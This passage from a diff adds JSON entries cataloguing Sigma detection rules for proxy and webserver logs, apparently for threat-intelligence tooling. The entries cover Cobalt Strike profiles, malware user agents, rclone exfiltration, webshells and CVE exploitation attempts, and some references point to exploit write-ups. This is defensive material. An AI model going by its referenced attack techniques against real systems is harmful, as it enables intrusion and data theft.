"proxy_ua_frameworks.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", + "value": "Exploit Framework User Agent" + }, + { + "description": "Detects WebDav DownloadCradle", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/04/06", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents", + "Legitimate WebDAV administration" + ], + "filename": "proxy_downloadcradle_webdav.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", + "value": "Windows WebDAV User Agent" + }, + { + "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/08", + "falsepositive": [ + "Software downloads" + ], + "filename": "proxy_download_susp_dyndns.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1105", + "attack.t1568" + ] + }, + "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", + "value": "Download from Suspicious Dyndns Hosts" + }, + { + "description": "Detects Malleable OneDrive Profile", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_onedrive.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", + "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile" + }, + { + "description": "Detects suspicious malformed user agent strings in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_susp.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", + "value": "Suspicious User Agent" + }, + { + "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/05", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "filename": "proxy_telegram_api.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.002" + ] + }, + "uuid": "b494b165-6634-483d-8c47-2026a6c52372", + "value": "Telegram API Access" + }, + { + "description": "Detects executable downloads from suspicious remote systems", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "All kind of software downloads" + ], + "filename": "proxy_download_susp_tlds_whitelist.yml", + "level": "low", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ] + }, + "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", + "value": "Download EXE from Suspicious TLD" + }, + { + "description": "Detects suspicious user agent strings used by malware in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_malware.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "http://www.botopedia.org/search?searchword=scan&searchphrase=all", + "https://perishablepress.com/blacklist/ua-2013.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", + "value": "Malware User Agent" + }, + { + "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_bitsadmin_susp_ip.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ] + }, + "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", + "value": "Bitsadmin to Uncommon IP Server Address" + }, + { + "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/10/18", + "falsepositive": [ + "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" + ], + "filename": "proxy_ua_rclone.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://rclone.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", + "value": "Rclone Activity via Proxy" + }, + { + "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/22", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "proxy_exchange_owassrf_exploitation.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", + "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_exploitation.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "1ddf4596-1908-43c9-add2-1d2c2fcc4797", + "value": "Potential OWASSRF Exploitation Attempt - Proxy" + }, + { + "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_cryptominer.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", + "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", + "value": "Crypto Miner User Agent" + }, + { + "description": "Detects download of Ursnif malware done by dropper documents.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ursnif_malware_download_url.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" + ], + "tags": "No established tags" + }, + "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", + "value": "Ursnif Malware Download URL Pattern" + }, + { + "description": "Detects URL pattern used by iOS Implant", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ios_implant.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "https://twitter.com/craiu/status/1167358457344925696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.collection", + "attack.t1005", + "attack.t1119", + "attack.credential_access", + "attack.t1528", + "attack.t1552.001" + ] + }, + "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", + "value": "iOS Implant URL Pattern" + }, + { + "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_malformed_uas.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", + "value": "CobaltStrike Malformed UAs in Malleable Profiles" + }, + { + "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/05", + "falsepositive": [ + "User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + ], + "filename": "proxy_raw_paste_service_access.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.virustotal.com/gui/domain/paste.ee/relations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003", + "attack.defense_evasion" + ] + }, + "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", + "value": "Raw Paste Service Access" + }, + { + "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", + "meta": { + "author": "Axel Olsson", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proxy_adv_ip_port_scanner_upd_check.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.advanced-port-scanner.com/", + "https://www.advanced-ip-scanner.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1590" + ] + }, + "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", + "value": "Advanced IP/Port Scanner Update Check" + }, + { + "description": "Detects download of certain file types from hosts in suspicious TLDs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/07", + "falsepositive": [ + "All kinds of software downloads" + ], + "filename": "proxy_download_susp_tlds_blacklist.yml", + "level": "low", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", + "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.spamhaus.org/statistics/tlds/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ] + }, + "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", + "value": "Download from Suspicious TLD" + }, + { + "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proxy_apt_domestic_kitten.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", + "value": "Domestic Kitten FurBall Malware Pattern" + }, + { + "description": "Detects Malleable Amazon Profile", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_amazon.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", + "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", + "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile" + }, + { + "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_pwndrop.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://breakdev.org/pwndrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003" + ] + }, + "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", + "value": "PwnDrp Access" + }, + { + "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_ocsp.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", + "value": "CobaltStrike Malleable (OCSP) Profile" + }, + { + "description": "Detects Windows PowerShell Web Access", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents" + ], + "filename": "proxy_powershell_ua.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "c8557060-9221-4448-8794-96320e6f3e74", + "value": "Windows PowerShell User Agent" + }, + { + "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_java_class_download.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" + ], + "tags": [ + "attack.initial_access" + ] + }, + "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", + "value": "Java Class Proxy Download" + }, + { + "description": "Detects Baby Shark C2 Framework communication patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_baby_shark.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", + "value": "BabyShark Agent Pattern" + }, + { + "description": "Detects suspicious user agent strings user by hack tools in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_hacktool.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", + "value": "Hack Tool User Agent" + }, + { + "description": "Detects suspicious user agent string of APT40 Dropbox tool", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/11/12", + "falsepositive": [ + "Old browsers" + ], + "filename": "proxy_apt40.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "Internal research from Florian Roth", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", + "value": "APT40 Dropbox Tool User Agent" + }, + { + "description": "Detects Ursnif C2 traffic.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ursnif_malware_c2_url.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1204.002", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", + "value": "Ursnif Malware C2 URL Pattern" + }, + { + "description": "Detects suspicious empty user agent strings in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_empty_ua.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/Carlos_Perez/status/883455096645931008", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", + "value": "Empty User Agent" + }, + { + "description": "Detects a flashplayer update from an unofficial location", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/10/25", + "falsepositive": [ + "Unknown flash download locations" + ], + "filename": "proxy_susp_flash_download_loc.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189", + "attack.execution", + "attack.t1204.002", + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", + "value": "Flash Player Update from Suspicious Location" + }, + { + "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/03/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://paper.seebug.org/1495/", + "https://twitter.com/wugeej/status/1369476795255320580", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978" + ] + }, + "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", + "value": "CVE-2021-21978 Exploitation Attempt" + }, + { + "description": "Detects Windows Webshells that use GET requests via access logs", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2017/02/19", + "falsepositive": [ + "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", + "User searches in search boxes of the respective website" + ], + "filename": "web_win_webshells_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://bad-jubies.github.io/RCE-NOW-WHAT/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", + "value": "Windows Webshell Strings" + }, + { + "description": "Detects exploitation attempts on WebLogic servers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/11/02", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_14882_weblogic_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/sudo_sudoka/status/1323951871078223874", + "https://isc.sans.edu/diary/26734", + "https://twitter.com/jas502n/status/1321416053050667009?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.14882" + ] + }, + "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", + "value": "Oracle WebLogic Exploit CVE-2020-14882" + }, + { + "description": "Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection", + "meta": { + "author": "Sittikorn S, Nuttakorn T", + "creation_date": "2022/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_26084_confluence_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", + "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", + "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26084_confluence_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "38825179-3c78-4fed-b222-2e2166b926b1", + "value": "Potential CVE-2021-26084 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/25", + "falsepositive": [ + "Unknown" + ], + "filename": "web_sonicwall_jarrewrite_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access" + ] + }, + "uuid": "6f55f047-112b-4101-ad32-43913f52db46", + "value": "SonicWall SSL/VPN Jarrewrite Exploit" + }, + { + "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/03", + "falsepositive": [ + "Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related" + ], + "filename": "web_exchange_exploitation_hafnium.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", + "value": "Exchange Exploitation Used by HAFNIUM" + }, + { + "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/17", + "falsepositive": [ + "Unknown" + ], + "filename": "web_solarwinds_supernova_webshell.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://www.anquanke.com/post/id/226029", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db", + "value": "Solarwinds SUPERNOVA Webshell Access" + }, + { + "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/07/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2018_2894_weblogic_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/LandGrey/CVE-2018-2894", + "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.t1505.003", + "cve.2018.2894" + ] + }, + "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", + "value": "Oracle WebLogic Exploit" + }, + { + "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_8193_8195_citrix_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", + "https://dmaasland.github.io/posts/citrix.html", + "https://support.citrix.com/article/CTX276688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", + "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195" + }, + { + "description": "Detects a successful Grafana path traversal exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/08", + "falsepositive": [ + "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error" + ], + "filename": "web_cve_2021_43798_grafana.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/search?q=CVE-2021-43798", + 